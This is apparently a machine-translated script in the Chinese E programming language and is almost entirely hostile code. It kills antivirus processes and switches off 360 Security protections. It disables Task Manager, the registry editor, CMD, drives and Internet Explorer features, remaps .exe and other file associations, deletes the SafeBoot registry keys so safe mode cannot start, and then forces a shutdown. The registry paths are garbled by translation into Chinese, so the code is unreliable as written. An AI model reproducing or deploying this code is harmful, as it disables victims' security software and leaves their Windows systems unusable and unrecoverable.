。支持庫外殼
。裝配窗裝配1
。subroutine _ button 1_被點擊。
繞過防病毒軟件防禦:
Run ("taskkill/f/im kavsvc.exe ",false,1)
Run ("taskkill /f /im KVXP.kxp ",false,1)
Run ("taskkill/f/im Rav.exe ",false,1)
Run ("taskkill/f/im Ravmon.exe ",false,1)
Run ("taskkill/f/im Mcshield.exe ",false,1)
Run ("taskkill/f/im VsTskMgr.exe ",false,1)
修改系統時間:
設置當前時間(到達時間(“8888年8月8日”))
禁用任務管理器:
寫入註冊密鑰(3,“軟件\ Microsoft \ Windows \當前版本\策略\系統\禁用Taskmgr”,0)。
禁用註冊表:
寫入註冊表項(3,“軟件\ Microsoft \ Windows \當前版本\策略\系統\禁用註冊表工具”,1)。
隱藏運行開始禁止WIN2000/XP通過任務管理器創建新任務:
寫註冊項(3,“software \ Microsoft \ windows \ current version \ policies \ explorer \ no run”,1)。
在MS-DOS模式下隱藏磁盤驅動器。在“我的電腦”或“MS-DOS”模式下看不到:
寫註冊項(3,“software \ Microsoft \ windows \ current version \ policies \ winold app \ disabled”,1)。
隱藏啟動關機:
寫註冊項(3,“軟件\微軟\ Windows \當前版本\ Policies \ Explorer \ Nolose”,1)。
在開始時隱藏搜索:
寫註冊項(3,“軟件\微軟\ Windows \當前版本\ Policies \ Explorer \ No Find”,1)。
360°以上防禦:
寫入註冊碼(4,“軟件\ 360安全\安全程序\執行訪問”,0)。
寫入註冊碼(4,“軟件\ 360安全\安全程序\ Monaccess”,0)
寫註冊項(4,“軟件\ 360安全\ Safemon \站點訪問”,0)。
寫入註冊碼(4,“software \ 360 safe \ safe mon \ udisk access”,0)。
結束360過程
Run ("taskkill/f/im 360tray.exe ",false,1)
隱藏所有驅動器:
寫註冊項(3,“軟件\微軟\ Windows \當前版本\ Policies \ Explorer \ Nodrives”,4294967295)。
禁用所有驅動器:
寫註冊項(3,“軟件\微軟\ Windows \當前版本\ Policies \ Explorer \ Noviewondrive”,4294967295)。
隱藏文件夾選項:
寫註冊項(3,“software \ Microsoft \ Windows \ current version \ policies \ explorer \ nofolderoptions”,1)。
隱藏桌面對象:
寫註冊項(3,“軟件\微軟\ Windows \當前版本\ Policies \ Explorer \無桌面”,1)。
隱藏啟動關機:
寫註冊項(3,“軟件\微軟\ Windows \當前版本\ Policies \ Explorer \ Nolose”,1)。
在開始時隱藏搜索:
寫註冊項(3,“軟件\微軟\ Windows \當前版本\ Policies \ Explorer \ No Find”,1)。
這篇文章有兩種情況。1禁用CMD和。bat文件2禁用CMD,但BAT 0啟用兩項。
寫註冊項(3,“軟件\策略\微軟\ Windows \系統\ Disablecmd”,1)。
隱藏主頁選項組:
寫註冊項(3,“軟件\策略\ Microsoft \ Internet Explorer \控制面板\主頁”,1)。
隱藏IE文件菜單:
寫註冊項(3,“軟件\微軟\ windows \當前版本\策略\資源管理器\文件菜單”,1)。
隱藏收藏夾菜單:
寫註冊項(3,“軟件\策略\微軟\ Internet Explorer \限制\無收藏夾”,1)。
禁用IE打印功能:
寫註冊項(3,“軟件\策略\微軟\ Internet Explorer \限制\不打印”,1)。
隱藏Internet選項:
寫註冊項(3,“軟件\策略\微軟\ Internet Explorer \限制\貴族瀏覽選項”,1)。
禁止IE查看源文件:
寫註冊項(3,“軟件\策略\微軟\ Internet Explorer \限制\無查看源”,1)。
禁用IE下載功能:
寫註冊項(3,“軟件\微軟\ Windows \當前版本\內部設置\ Zones \ 3 \ 1803”,3)。
沒有右鍵上下文菜單:
寫註冊項(3,“軟件\策略\微軟\ Internet Explorer \限制\ Noble ContextMenu”,1)。
修改文件關聯:
寫登記項(1,”。txt \ "," JPEG文件")。
寫登記項(1,”。INF \ "," JPEG文件")。
寫登記項(1,”。reg \ "," JPEG文件")。
寫登記項(1,”。exe \ "," JPEG文件")。
無法進入安全模式:
刪除註冊項(4,“系統\當前控制集\控制\安全引導\ { 36 fc 9 e 60-C465-11cf-8056-444553540000 } \ ")。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\ { 4d 36 e 965-e325-1ce-bfc 1-08002 be 10318 }”
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\ { 4d 36 e 967-e325-1ce-bfc 1-08002 be 10318 }”
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\ { 4d 36 e 969-e325-1ce-bfc 1-08002 be 10318 }”
刪除註冊項(4,“系統\當前控制集\控制\安全引導\ { 4d 36 e 96 a-E325-11ce-bfc 1-08002 be 10318 } \
刪除註冊項(4,“系統\當前控制集\控制\安全引導\ { 4d 36 e 96 b-E325-11CE-bfc 1-08002 be 10318 } \
刪除註冊項(4,“系統\當前控制集\控制\安全引導\ { 4d 36 e 96 f-e325-1ce-bfc 1-08002 be 10318 } \
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\ { 4d 36 e 972-e325-1ce-bfc 1-08002 be 10318 }”
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\ { 4d 36 e 973-e325-1ce-bfc 1-08002 be 10318 }”
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\ { 4d 36 e 974-e325-1ce-bfc 1-08002 be 10318 }”
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\ { 4d 36 e 975-e325-1ce-bfc 1-08002 be 10318 }”
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\ { 4d 36 e 977-e325-1ce-bfc 1-08002 be 10318 }”
刪除註冊項(4,“系統\當前控制集\控制\安全引導\ { 4d 36 e 97 b-e325-1ce-bfc 1-08002 be 10318 } \
刪除註冊項(4,"系統\當前控制集\控制\安全引導\ { 4d 36 e 97d-e325-1ce-bfc 1-08002 be 10318 } \
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\ { 4d 36 e 980-e325-1ce-bfc 1-08002 be 10318 }”
刪除註冊項(4,“系統\當前控件集\控件\ Safeboot \ { 71a 27 cdd-812A-11 d0-be C7-08002 be 2092 f } \ ")。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\ { 745 a 17a 0-74d 3-11d 0-B6FE-00 A0 c 90 f 57 da } \ ")。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\ AFD”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\ appmgmt”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\基礎”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\引導總線擴展器”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\引導文件系統”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\瀏覽器”)。
刪除註冊項(4,“系統\當前控件集\控件\ Safeboot \網絡\ Cryptsvc”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\ dcomlaunch”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\ DHCP”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\ dmadmin”)。
刪除註冊密鑰(4,“system \ current control set \ control \ safeboot \ network \ dmboot . sys”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\ dmio.sys”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\ dmload.sys”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\ DM服務器”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\ dnscache”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\事件日誌”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\文件系統”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\過濾器”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\幫助svc”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\ ip6fw.sys”)。
刪除註冊密鑰(4,“system \ current control set \ control \ safeboot \ network \ ipnat . sys”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\ Lanmanserver”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\藍曼工作站”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\ lmhosts”)。
刪除註冊項(4,“系統\當前控件集\控件\安全引導\網絡\信使”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\ ndis”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\ ndiswrapper”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\ ndisuio”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\ NetBIOS”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\ NetBIOS組”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\ netbt”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\ netdde組”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\ netlogon”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\ netman”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\網絡”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\網絡提供商”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\ NTLM ssp”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\ PCI配置”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\即插即用”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\ PNP過濾器”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\ PNP _ TDI”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\主磁盤”)。
刪除註冊碼(4,“system \ current control set \ control \ safeboot \ network \ rdpcdd . sys”)。
刪除註冊碼(4,“system \ current control set \ control \ safeboot \ network \ rdpdd . sys”)。
刪除註冊碼(4,“system \ current control set \ control \ safeboot \ network \ rd pwd . sys”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\ rd會話管理器”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\ rpcss”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\ SCSI類”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\ sermouse.sys”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\共享訪問”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\ sr.sys”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\服務”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\流驅動程序”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\系統總線擴展器”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\ tcpip”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\ TDI”)。
刪除註冊項(4,“system \ current control set \ control \ safeboot \ network \ TD pipe . sys”)。
刪除註冊碼(4,“system \ current control set \ control \ safeboot \ network \ TD TCP . sys”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\ $ TERM服務”)
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\ vga.sys”)。
刪除註冊項(4,“system \ current control set \ control \ safeboot \ network \ VGA save . sys”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\ winmgmt”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\ wzcsvc”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡\ ndisuio”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導\網絡”)。
刪除註冊項(4,“系統\當前控制集\控制\安全引導”)。
關閉:
關閉系統(2,真)